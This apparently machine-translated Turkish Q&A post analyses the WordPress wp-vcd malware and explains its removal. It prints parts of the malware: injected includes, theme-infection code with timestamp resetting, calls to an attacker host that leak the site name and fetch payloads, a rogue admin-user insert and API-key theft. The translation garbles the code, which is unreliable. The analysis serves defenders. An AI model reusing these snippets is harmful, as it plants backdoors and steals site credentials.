Artık soru sormaya yada sorulara yanıt vermeye hazırsınız! Hemen bir soru sorun yada bir soru seçin...
0 oy
70 kez görüntülendi
Wordpress kategorisinde tarafından

Bu kötü amaçlı yazılımın varlığı hakkında hiçbir fikrimiz yok. Güvenlik duvarı için wordfence sayesinde, çekirdek wp dosyasındaki bir değişiklik hakkında beni uyardı,

Örnek wp-içerir / post.php  :

<? php if (file_exists (dirname (__ FILE__). '/wp-vcd.php')) include_once (dirname (__ FILE__). '/wp-vcd.php'); ?> <? php 
[.. Dosyaların Sırası ..]

Örnek:  .../wp-includes/wp-vcd.php

Enjekte wp-vcd.php dosyası $ install_code adında uzun bir base64 kodlanmış dizgisi ile başlar

$ install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd [... Blah blah blah blah ..] 
$ install_hash = md5 ($ _ SERVER [' HTTP_HOST ']; 
   $ install_code = str_replace ('{$ PASSWORD}', $ install_hash, base64_decode ($ install_code));

Bu dosya, kodlama dizesinin kodunu temanın işlevlerinin içine enjekte eder , değişiklik tarihini ve saatini sıfırlamayı dikkate alarak

Örnek: ..../wp-contents/themes/Your_Theme_Name/functions.php

if ($ content = file_get_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php')) { 
    if (strpos ($ content, 'WP_V_CD') 
        = ) ( eğer) . $ içerik; 
        @dosya_put_contents ($ temalar. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ içerik); 
        dokunma ($ temalar. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ time); 
    } 
    else {$ ping = yanlış; } 
}

o zaman aracılığıyla uzaktan kod enjeksiyonları ana bilgisayar adlarının ve şifrelerin bir veritabanı / dizi doldurur test.php ve iç uzak bir txt dosyasının içeriğini indirir class.wp.php

if ($ ping) {$ content = @file_get_contents (' http://www.spekt.cc/test.php?host=' . $ _SERVER [“HTTP_HOST”]. '& şifre ='. $ install_hash); @dosya_put_contents (ABSPATH. '/wp-includes/class.wp.php', file_get_contents (' http://www.spekt.cc/admin.txt' )); }
if ($ ping2) {$ content = @dosya_get_contents (' http://www.spekt.cc/test.php?host=' . $ _SERVER [“HTTP_HOST”]. '& şifre ='. $ install_hash); @dosya_put_contents (ABSPATH. 'wp-içerir / class.wp.php', file_get_contents (' http://www.spekt.cc/admin.txt ')) ; // echo ABSPATH. '/ class.wp.php Wp-içeren'; }

Örnek ../wp-includes/class.wp.php

class.wp.php wp db içindeki bir kullanıcıyı enjekte etmeye çalışır

$ wpdb-> query (“INSERT IN $ $ wpdb-> kullanıcıları (` ID`, `user_login`,` user_pass`, `user_nicename`,` user_email ', `user_url`,` user_nicename`, user_email`, `user_url`,` user_registered`, user_activation_key`, user_tatic , `display_name`) DEĞERLER ('100011111', '100011111', '\ $ P \ $ c18615a1ef0e1cd813b388b4B6e29bcd.', '100011111', 'spekt@spekt.cc', '', '2010–06-07 00:00: 00 ',' ',' 0 ',' 100010010 ') ”);

Ve muhtemelen temaları güncellemenin bir yolu olarak Envato Market Wordpress Toolkit API anahtarıyla uğraşıyor

if (isset ($ _ GET ['anahtar']))) {$ options = get_option (EWPT_PLUGIN_SLUG); echo '<center> <h2>'. esc_attr ($ options ['user_name']. ':'. 'esc_attr ($ options [' api_key '])). '<br>'; echo esc_html (envato_market () -> get_option ('token')); echo '</center> </h2>'; }}

Sonra geçici bir php dizini içerisine codecxc.txt olan başka bir uzak txt dosyasının içeriğini enjekte eder.

işlevi wp_temp_setupx ($ phpCode) 
{ 
$ tmpfname = tempnam (sys_get_temp_dir (), “wp_temp_setupx”); 
$ handle = fopen ($ tmpfname, “w +”); 
fwrite ($ tanıtıcı, “<? php \ n”. $ phpCode); 
fclose ($ dt); 
$ tmpfname; ($ tmpfname) bağlantısını kaldırma; 
return get_defined_vars (); 
}

functions.php

B64, options.php dosyasının en üst kısmına enjekte edilir ve wp db'nin içinde yazılar ve linkleri yeni içerikle değiştirmek için arar

foreach ($ wpdb-> get_results ('' SELECT * FROM ''. $ wpdb-> önek. 'posts`' nerede 'post_status` = "yayınla" VE `post_type = =" post "SİPARİŞ NO" DESC, "ARRAY_A") $ data olarak) 
[...] 
$ post_content = preg_replace ('! <div id = "'. $ div_code_name. '"> (. *?) </div>! s', '', $ veri -> post_content ); 
[...] 
$ file = preg_replace ('/'.$ matcholddiv [1] [0].' / i ', $ _ REQUEST [' newdiv '], $ dosyası); 
[...] 
$ file = preg_replace ('/'.$ alan adı [1] [0].' / i ', $ _ REQUEST [' newdomain '], $ dosyası);
if ($ wpdb -> query ('INSERT INTO `' '. $ wpdb-> prefix.' datalist` SET` url` = "/'.mysql_escape_string($_REQUESTГ'url ']).'", `title` = "'.mysql_escape_string ($ _ REQUEST [' title ']).'", `anahtar kelimeler` = "'.mysql_escape_string ($ _ REQUEST [' anahtar kelimeler ']).'", `açıklama` =" '.mysql_escape_string ($ _ REQUEST [ 'açıklama']). '",` content` = "' .mysql_escape_string ($ _ REQUEST ['content']). '", `full_content` ="' .mysql_escape_string ($ _ REQUEST ['full_content']). '" DUPLICATE ANAHTARI GÜNCELLEME `title` =" '.mysql_escape_string ($ _ REQUEST [' title ']).' ",` Anahtar kelimeler `=" '.mysql_escape_string ($ _ REQUEST [' anahtar kelimeler ']). " "'.mysql_escape_string ($ _ REQUEST ['açıklama']). '",` content` = "' .mysql_escape_string (urldecode ($ _ REQUEST ['içerik']))). '", `full_content` ="' .mysql_escape_string ($ REQU 'full_content']). '"'))

Html içeriği kısmen php içinde bulunur ve kısmen uzaktan codeX.phpyardımı ile uzaktan indirilir

if (! function_exists ('wp_temp_setup'))) { 
$ path = $ _ SUNUCU ['HTTP_HOST']. $ _ SERVER [REQUEST_URI];
if ($ tmpcontent = @file_get_contents (" http: // www.spekt.cc /codeX.php?i= ". $ yol))

Www.spekt.cc'nin tescil ettirenlerin kimliğini korumak için yeni etki alanı gizlilik hizmetlerinden yararlandığını söylemeye gerek bile yoktur . Cloudflare tarafından WhoisGuard kullandılar.

Sonunda, Sonuç

Bu özellikle tehlikeli bir kötü amaçlı yazılım olmasa da, evet, bu kötü amaçlı yazılım aynı kök dizinde (siteler arası kontaminasyon) birden fazla wordpress kurulumunun bulunduğu paylaşımlı bir barındırmada çoğalabilir. Güncellenmiş bir Wordpress kurulumunda bile bu tür saldırıların kurbanı olmamak için ekstra özen gösterilmelidir.

Çekirdek dosya değişikliklerini izleyen bir güvenlik duvarı tutun ve temaları daima güncelleyin..

Tüm makaleyi okuduğunuz için teşekkür ederiz. Bencil olma. Wordpress Arkadaşlarınızla paylaşmalısınız.

Lütfen www.spekt.cc için Google Güvenli Tarama'yı bildirin.

1. Düzenleme: Bu kötü amaçlı yazılımı kaldırma çözümü:

Bu yazının sonunda yanıt olarak daha fazla çözüm bulabilirsiniz.

Bunu zararlı kodlar, nulled, free, full sürüm sitelerinden inen bir tema yada eklenti ile bulaşıyor.

“Etki alanınız çok bölgeli wordpress kurulumuna sahipse, dikkatli olmanız gerekir. Wordpress'i alt alanlara veya alt dizinlere ayrı olarak yüklediyseniz, wordpress'i Root domain dir. example.com ve sub1.example.com, sub2.example.com vb. gibi 2-3 alt etki alanındaki diğer wordpress yüklemeleri, Tüm alt etki alanlarınız bu saldırıdan etkilenebilir.

Bunların olduğundan emin ol. Karşılaştırıcının ötesinde kullanın ve geçerli dizin yapınızı haftalık veya aylık olarak karşılaştırın. ”- 

“Bu tür saldırılardan etkilenen paylaşımlı barındırma wordpress web sitelerinin çoğunun bu olduğunu gördüm.

Size önermek istediklerim, Yeni wordpress kurulumunun, temaların ve eklentilerin yedeğini alın. Karşılaştırıcının ötesinde kullanın (veya dosya ve klasörleri karşılaştırabilen herhangi bir araç) ve haftalık veya aylık olarak kullanın. ”

Bundan sonra, yukarıdaki kodu wp-core ve function.php adresinden kaldırmanız gerekir (temanızın içinde bulunabilir), WordPress'inizi kötü amaçlı yazılımlardan korumak için GOTMLS: Kötü Amaçlı Yazılımdan Koruma Güvenliği ve Brute-Force Firewall kullanın.

“Güvenlik tedaviden daha iyidir.”

Düzenleme # 2 : İşte bu makalenin bazı referansları.

Analiz ve her şeyi sarım için teşekkürler Manuel D'Orso , bu makaleye bakın . Wp-vcd hakkında daha fazla bilgi edinmem için çok yardımcı oldu. Gerçek sorunlarını göstermek için pasajının bir kısmını kullandım. Çalışmalarını Github'da da bulabilirsiniz .

GOTMLS sayesinde : Tüm wp-core ve temayı otomatik olarak taramak için Kötü Amaçlı Yazılımlara Karşı Koruma Güvenliği ve Brute-Force Güvenlik Duvarı ve wp’nizde bulunan bilinmeyen tehdidi bildirebilir / kaldırabilir.

Çekirdek dosya değişikliklerimiz olduğunda bize bildirdiğiniz için Wordfence Güvenliği'ne teşekkür ederiz . Sözcüğün birçok kötü amaçlı yazılımı algılayabildiğini duymak gerçekten harika.

Feragatname  : Bu makale, telif haklarını ihlal etmek veya başkasının işine ya da başkasına hakaret etmek anlamına gelmez. Bu makale WP - VCD kötü amaçlı yazılım saldırısının mağdurlarına yardımcı olacaktır . Müthiş çalışmaları için yukarıda belirtilen krediler. Bu makale Wp-vcd kötü amaçlı yazılıma bulaşmış / bulaştırılmış kişilere yardımcı olmak için hazırlanmıştır.)

Kaynak: https://medium.com/@rakshitshah/wordpress-wp-vcd-malware-attack-e7394801895d

Cevabınız

Görüntülenecek adınız (isteğe bağlı):
Gizlilik: E-posta adresiniz yalnızca bu bildirimlerin gönderilmesi için kullanılacak.
İstenmeyen Reklam Koruması:
Gelecekte bu doğrulamadan kurtulmak için, lütfen giriş yapınız veya kayıt olunuz.
...